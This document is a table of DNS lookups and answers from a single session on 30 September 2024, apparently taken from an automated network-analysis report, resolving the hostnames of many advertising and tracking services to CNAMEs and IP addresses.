                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.251184940 CEST1.1.1.1192.168.2.40x1e9aNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com54.78.106.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.251184940 CEST1.1.1.1192.168.2.40x1e9aNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com99.80.51.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.251184940 CEST1.1.1.1192.168.2.40x1e9aNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com54.220.80.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.251184940 CEST1.1.1.1192.168.2.40x1e9aNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com3.248.166.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.251184940 CEST1.1.1.1192.168.2.40x1e9aNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com54.171.96.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.251184940 CEST1.1.1.1192.168.2.40x1e9aNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.17.21.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.251184940 CEST1.1.1.1192.168.2.40x1e9aNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com63.33.228.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.936252117 CEST1.1.1.1192.168.2.40xf79No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.936252117 CEST1.1.1.1192.168.2.40xf79No error (0)ib.anycast.adnxs.com37.252.171.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.936252117 CEST1.1.1.1192.168.2.40xf79No error (0)ib.anycast.adnxs.com37.252.171.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.936252117 CEST1.1.1.1192.168.2.40xf79No error (0)ib.anycast.adnxs.com37.252.172.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.936252117 CEST1.1.1.1192.168.2.40xf79No error (0)ib.anycast.adnxs.com37.252.171.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.936252117 CEST1.1.1.1192.168.2.40xf79No error (0)ib.anycast.adnxs.com37.252.171.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.936252117 CEST1.1.1.1192.168.2.40xf79No error (0)ib.anycast.adnxs.com37.252.171.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.936252117 CEST1.1.1.1192.168.2.40xf79No error (0)ib.anycast.adnxs.com37.252.173.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.944852114 CEST1.1.1.1192.168.2.40x2d7cNo error (0)match.adsby.bidtheatre.com64.227.64.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.944852114 CEST1.1.1.1192.168.2.40x2d7cNo error (0)match.adsby.bidtheatre.com188.166.17.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.944852114 CEST1.1.1.1192.168.2.40x2d7cNo error (0)match.adsby.bidtheatre.com134.122.57.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.595725060 CEST1.1.1.1192.168.2.40x2683No error (0)dis.criteo.comwidget.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.595725060 CEST1.1.1.1192.168.2.40x2683No error (0)widget.nl3.vip.prod.criteo.com178.250.1.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.597222090 CEST1.1.1.1192.168.2.40x6cb7No error (0)dis.criteo.comwidget.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852473974 CEST1.1.1.1192.168.2.40xd4f1No error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com91.134.110.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com51.178.195.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com5.196.111.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com149.202.238.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com149.202.238.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com5.196.111.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com164.132.25.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com178.32.197.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com51.178.195.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com5.135.209.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com217.182.178.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com217.182.178.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com91.134.110.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com178.32.197.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com5.135.209.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.852961063 CEST1.1.1.1192.168.2.40x3304No error (0)rtb-csync-euw2.smartadserver.com164.132.25.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.926606894 CEST1.1.1.1192.168.2.40xb624No error (0)b1sync.zemanta.comb1-use1.zemanta.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.926606894 CEST1.1.1.1192.168.2.40xb624No error (0)b1-use1.zemanta.comzemanta-nychi2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.926606894 CEST1.1.1.1192.168.2.40xb624No error (0)zemanta-nychi2.outbrain.orgchidc2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.926673889 CEST1.1.1.1192.168.2.40x1d1dNo error (0)b1sync.zemanta.comb1-use1.zemanta.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.926673889 CEST1.1.1.1192.168.2.40x1d1dNo error (0)b1-use1.zemanta.comzemanta-nychi2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.926673889 CEST1.1.1.1192.168.2.40x1d1dNo error (0)zemanta-nychi2.outbrain.orgnydc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.926673889 CEST1.1.1.1192.168.2.40x1d1dNo error (0)nydc1.outbrain.org70.42.32.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.144884109 CEST1.1.1.1192.168.2.40x272eNo error (0)sync-pm.ads.yieldmo.comsync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.144884109 CEST1.1.1.1192.168.2.40x272eNo error (0)sync.ads.yieldmo.comeu-west-1-sync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.144884109 CEST1.1.1.1192.168.2.40x272eNo error (0)eu-west-1-sync.ads.yieldmo.comsync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.179882050 CEST1.1.1.1192.168.2.40x5298No error (0)simage2.pubmatic.comsimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.179882050 CEST1.1.1.1192.168.2.40x5298No error (0)simage2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.179882050 CEST1.1.1.1192.168.2.40x5298No error (0)pug-lhr-bc.pubmnet.com185.64.191.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.180116892 CEST1.1.1.1192.168.2.40xd877No error (0)simage2.pubmatic.comsimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.180116892 CEST1.1.1.1192.168.2.40xd877No error (0)simage2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.185764074 CEST1.1.1.1192.168.2.40x4e1dNo error (0)sync-pm.ads.yieldmo.comsync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.185764074 CEST1.1.1.1192.168.2.40x4e1dNo error (0)sync.ads.yieldmo.comeu-west-1-sync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.185764074 CEST1.1.1.1192.168.2.40x4e1dNo error (0)eu-west-1-sync.ads.yieldmo.comsync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.185764074 CEST1.1.1.1192.168.2.40x4e1dNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com99.80.251.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.185764074 CEST1.1.1.1192.168.2.40x4e1dNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.77.210.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.185764074 CEST1.1.1.1192.168.2.40x4e1dNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.77.217.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.185764074 CEST1.1.1.1192.168.2.40x4e1dNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com18.202.112.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.185764074 CEST1.1.1.1192.168.2.40x4e1dNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.194.167.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.185764074 CEST1.1.1.1192.168.2.40x4e1dNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.171.247.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.185764074 CEST1.1.1.1192.168.2.40x4e1dNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com3.251.14.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.185764074 CEST1.1.1.1192.168.2.40x4e1dNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.16.44.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.325108051 CEST1.1.1.1192.168.2.40x8637No error (0)sync.1rx.io46.228.174.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.707250118 CEST1.1.1.1192.168.2.40xaeb3No error (0)sync.intentiq.com3.160.150.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.707250118 CEST1.1.1.1192.168.2.40xaeb3No error (0)sync.intentiq.com3.160.150.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.707250118 CEST1.1.1.1192.168.2.40xaeb3No error (0)sync.intentiq.com3.160.150.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.707250118 CEST1.1.1.1192.168.2.40xaeb3No error (0)sync.intentiq.com3.160.150.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.903785944 CEST1.1.1.1192.168.2.40x6209No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.903785944 CEST1.1.1.1192.168.2.40x6209No error (0)image2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.903785944 CEST1.1.1.1192.168.2.40x6209No error (0)pug-ams-bc.pubmnet.com198.47.127.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.903839111 CEST1.1.1.1192.168.2.40x1fb6No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.903839111 CEST1.1.1.1192.168.2.40x1fb6No error (0)image2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.904376030 CEST1.1.1.1192.168.2.40xafeaNo error (0)widget.us.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.904716015 CEST1.1.1.1192.168.2.40xcecaNo error (0)widget.us.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.904716015 CEST1.1.1.1192.168.2.40xcecaNo error (0)widget.us5.vip.prod.criteo.com74.119.117.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:38.890850067 CEST1.1.1.1192.168.2.40x64d2No error (0)sync.targeting.unrulymedia.comsync.1rx.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:38.890850067 CEST1.1.1.1192.168.2.40x64d2No error (0)sync.1rx.io46.228.174.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:38.891088963 CEST1.1.1.1192.168.2.40x4008No error (0)sync.targeting.unrulymedia.comsync.1rx.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:39.079106092 CEST1.1.1.1192.168.2.40x8e62No error (0)ssp-sync.criteo.comssp-sync.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:39.079106092 CEST1.1.1.1192.168.2.40x8e62No error (0)ssp-sync.nl3.vip.prod.criteo.com178.250.1.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:39.079231977 CEST1.1.1.1192.168.2.40x4369No error (0)ssp-sync.criteo.comssp-sync.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126527071 CEST1.1.1.1192.168.2.40x40c1No error (0)ap.lijit.comvap.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126527071 CEST1.1.1.1192.168.2.40x40c1No error (0)vap.lijit.comemeas.vap.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126527071 CEST1.1.1.1192.168.2.40x40c1No error (0)emeas.vap.lijit.comeu.vap.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126527071 CEST1.1.1.1192.168.2.40x40c1No error (0)eu.vap.lijit.comblackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126883984 CEST1.1.1.1192.168.2.40x8cb8No error (0)ap.lijit.comvap.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126883984 CEST1.1.1.1192.168.2.40x8cb8No error (0)vap.lijit.comemeas.vap.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126883984 CEST1.1.1.1192.168.2.40x8cb8No error (0)emeas.vap.lijit.comeu.vap.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126883984 CEST1.1.1.1192.168.2.40x8cb8No error (0)eu.vap.lijit.comblackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126883984 CEST1.1.1.1192.168.2.40x8cb8No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com52.214.155.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126883984 CEST1.1.1.1192.168.2.40x8cb8No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com34.248.207.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126883984 CEST1.1.1.1192.168.2.40x8cb8No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com52.48.40.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126883984 CEST1.1.1.1192.168.2.40x8cb8No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com52.213.71.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126883984 CEST1.1.1.1192.168.2.40x8cb8No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com52.213.225.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126883984 CEST1.1.1.1192.168.2.40x8cb8No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com99.81.214.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126883984 CEST1.1.1.1192.168.2.40x8cb8No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com52.215.102.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.126883984 CEST1.1.1.1192.168.2.40x8cb8No error (0)blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com54.76.222.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:43.768311024 CEST1.1.1.1192.168.2.40xf78cNo error (0)dsp.nrich.ai51.68.39.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:43.996694088 CEST1.1.1.1192.168.2.40x84bfNo error (0)s.ad.smaato.net13.32.27.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:43.996694088 CEST1.1.1.1192.168.2.40x84bfNo error (0)s.ad.smaato.net13.32.27.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:43.996694088 CEST1.1.1.1192.168.2.40x84bfNo error (0)s.ad.smaato.net13.32.27.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:43.996694088 CEST1.1.1.1192.168.2.40x84bfNo error (0)s.ad.smaato.net13.32.27.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:44.727947950 CEST1.1.1.1192.168.2.40x7d51No error (0)prebid.a-mo.netnld-prebid.a-mx.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:44.728935957 CEST1.1.1.1192.168.2.40x396eNo error (0)prebid.a-mo.netnld-prebid.a-mx.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:44.728935957 CEST1.1.1.1192.168.2.40x396eNo error (0)nld-prebid.a-mx.net163.5.194.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:44.728935957 CEST1.1.1.1192.168.2.40x396eNo error (0)nld-prebid.a-mx.net163.5.194.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:44.728935957 CEST1.1.1.1192.168.2.40x396eNo error (0)nld-prebid.a-mx.net163.5.194.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:44.728935957 CEST1.1.1.1192.168.2.40x396eNo error (0)nld-prebid.a-mx.net163.5.194.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:44.728935957 CEST1.1.1.1192.168.2.40x396eNo error (0)nld-prebid.a-mx.net163.5.194.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:44.728935957 CEST1.1.1.1192.168.2.40x396eNo error (0)nld-prebid.a-mx.net163.5.194.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:44.728935957 CEST1.1.1.1192.168.2.40x396eNo error (0)nld-prebid.a-mx.net163.5.194.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:44.728935957 CEST1.1.1.1192.168.2.40x396eNo error (0)nld-prebid.a-mx.net163.5.194.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:45.042983055 CEST1.1.1.1192.168.2.40x4d1dNo error (0)cs.krushmedia.com8.2.110.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:45.951323032 CEST1.1.1.1192.168.2.40x4dc2No error (0)sync.go.sonobi.comiad-2-sync.go.sonobi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:45.951323032 CEST1.1.1.1192.168.2.40x4dc2No error (0)iad-2-sync.go.sonobi.com69.166.1.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:45.951323032 CEST1.1.1.1192.168.2.40x4dc2No error (0)iad-2-sync.go.sonobi.com69.166.1.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:45.951323032 CEST1.1.1.1192.168.2.40x4dc2No error (0)iad-2-sync.go.sonobi.com69.166.1.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:45.951323032 CEST1.1.1.1192.168.2.40x4dc2No error (0)iad-2-sync.go.sonobi.com69.166.1.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:45.952819109 CEST1.1.1.1192.168.2.40xf61dNo error (0)sync.go.sonobi.comiad-2-sync.go.sonobi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:46.109250069 CEST1.1.1.1192.168.2.40xcda0No error (0)s0.2mdn.net216.58.212.134A (IP address)IN (0x0001)false
